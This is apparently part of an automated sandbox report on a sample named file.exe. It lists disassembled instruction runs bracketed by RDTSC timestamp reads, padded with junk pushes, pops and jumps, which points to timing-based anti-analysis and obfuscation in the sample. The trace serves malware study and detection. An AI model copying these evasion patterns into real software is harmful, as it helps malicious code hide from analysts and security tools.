Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E9A67 second address: 8E9A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914525 second address: 91456A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B84Ch 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 push edi 0x00000015 jmp 00007FB7D509B857h 0x0000001a pop edi 0x0000001b pushad 0x0000001c jbe 00007FB7D509B846h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91456A second address: 914579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FB7D50A5ED6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9146B4 second address: 9146EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007FB7D509B846h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D509B854h 0x00000016 jmp 00007FB7D509B852h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9146EB second address: 9146EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9146EF second address: 9146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914C75 second address: 914C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914C79 second address: 914C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914C7D second address: 914C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9169E9 second address: 9169ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9169ED second address: 916A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB7D50A5EE5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916A0B second address: 916A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B84Bh 0x00000008 jbe 00007FB7D509B846h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91A89B second address: 91A8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91A8A9 second address: 91A8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB7D509B855h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91FC35 second address: 91FC52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91FC52 second address: 91FC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D509B858h 0x0000000b pop edi 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F2E8 second address: 91F2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F2F3 second address: 91F2F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F55F second address: 91F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922301 second address: 92230B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92230B second address: 92230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9223C4 second address: 9223CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9223CD second address: 9223E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007FB7D50A5EEFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9223E0 second address: 92240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B851h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB7D509B84Ch 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92240D second address: 922414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922414 second address: 922446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov si, 3F19h 0x0000000d call 00007FB7D509B849h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB7D509B858h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922446 second address: 92244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92244A second address: 922450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922450 second address: 92246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92246D second address: 9224FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB7D509B851h 0x0000000e push esi 0x0000000f jno 00007FB7D509B846h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c push ebx 0x0000001d jmp 00007FB7D509B858h 0x00000022 pop ebx 0x00000023 pop ebx 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FB7D509B857h 0x0000002d jmp 00007FB7D509B854h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FB7D509B859h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922643 second address: 922649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922649 second address: 92264D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92313E second address: 923142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923142 second address: 923146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923146 second address: 92314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92314C second address: 923153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923153 second address: 92317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a sub dword ptr [ebp+122D27A9h], edx 0x00000010 stc 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923557 second address: 923574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B854h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923BB7 second address: 923C1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EE9h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2760h], edi 0x0000002d sub dword ptr [ebp+122D31F6h], ecx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D2E46h], esi 0x0000003b push 00000000h 0x0000003d or dword ptr [ebp+1245949Dh], edx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923C1A second address: 923C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923C1F second address: 923C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926C51 second address: 926C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DEA second address: 924DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926C57 second address: 926CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB7D509B848h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edi, 7340C3B1h 0x0000002d push 00000000h 0x0000002f sub dword ptr [ebp+122D25C2h], eax 0x00000035 movsx esi, dx 0x00000038 push 00000000h 0x0000003a mov di, ax 0x0000003d xchg eax, ebx 0x0000003e jp 00007FB7D509B850h 0x00000044 push eax 0x00000045 pushad 0x00000046 jl 00007FB7D509B84Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DEE second address: 924DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DF2 second address: 924E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928126 second address: 92813F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92955A second address: 929575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928921 second address: 928925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928925 second address: 928945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B84Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B84Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92ED54 second address: 92EDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 movzx ebx, ax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 and di, 7519h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FB7D50A5ED8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 stc 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jno 00007FB7D50A5ED6h 0x00000053 pop edi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D008 second address: 92D095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB7D509B852h 0x0000000b jmp 00007FB7D509B854h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 cmc 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FB7D509B84Ch 0x00000022 js 00007FB7D509B856h 0x00000028 call 00007FB7D509B84Fh 0x0000002d pop ebx 0x0000002e pop ebx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jmp 00007FB7D509B850h 0x0000003b mov eax, dword ptr [ebp+122D1249h] 0x00000041 mov ebx, dword ptr [ebp+122D32C6h] 0x00000047 push FFFFFFFFh 0x00000049 clc 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jo 00007FB7D509B846h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EDBC second address: 92EDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EDCB second address: 92EDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EEE7 second address: 92EEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EEEB second address: 92EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EEF1 second address: 92EF87 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D50A5ED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 and edi, 5B2CD2D7h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 add dword ptr [ebp+122D27A9h], ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007FB7D50A5ED8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b call 00007FB7D50A5EE1h 0x00000060 cmc 0x00000061 pop edi 0x00000062 mov eax, dword ptr [ebp+122D0D7Dh] 0x00000068 mov edi, dword ptr [ebp+122D27C2h] 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007FB7D50A5EDBh 0x00000075 push eax 0x00000076 push edi 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930E2E second address: 930EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007FB7D509B852h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D2BD2h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB7D509B848h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 or ebx, dword ptr [ebp+122D3858h] 0x00000037 mov dword ptr [ebp+122D38BEh], ecx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FB7D509B848h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a cld 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007FB7D509B851h 0x00000063 pop eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931D6F second address: 931D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931D73 second address: 931D87 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB7D509B846h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931F1E second address: 931FC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FB7D50A5ED8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bx, si 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ebx, dword ptr [ebp+122D2AEEh] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jne 00007FB7D50A5EDCh 0x00000043 mov eax, dword ptr [ebp+122D0A55h] 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007FB7D50A5ED8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D2B6Eh] 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D2AFEh] 0x00000071 nop 0x00000072 jmp 00007FB7D50A5EDBh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931FC9 second address: 931FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936521 second address: 93652F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB7D50A5EDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93652F second address: 93657D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 and edi, 0F847E87h 0x0000000e push 00000000h 0x00000010 xor ebx, dword ptr [ebp+122D2B72h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FB7D509B848h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB7D509B850h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93657D second address: 936596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A766 second address: 93A770 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93ACD4 second address: 93AD5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FB7D50A5EE0h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FB7D50A5ED8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub bl, FFFFFFE2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FB7D50A5ED8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2E25h], ebx 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FB7D50A5EE9h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BF16 second address: 93BF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BF24 second address: 93BF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937891 second address: 9378B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D509B852h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93673B second address: 936756 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5EDCh 0x00000008 jnp 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FB7D50A5ED8h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
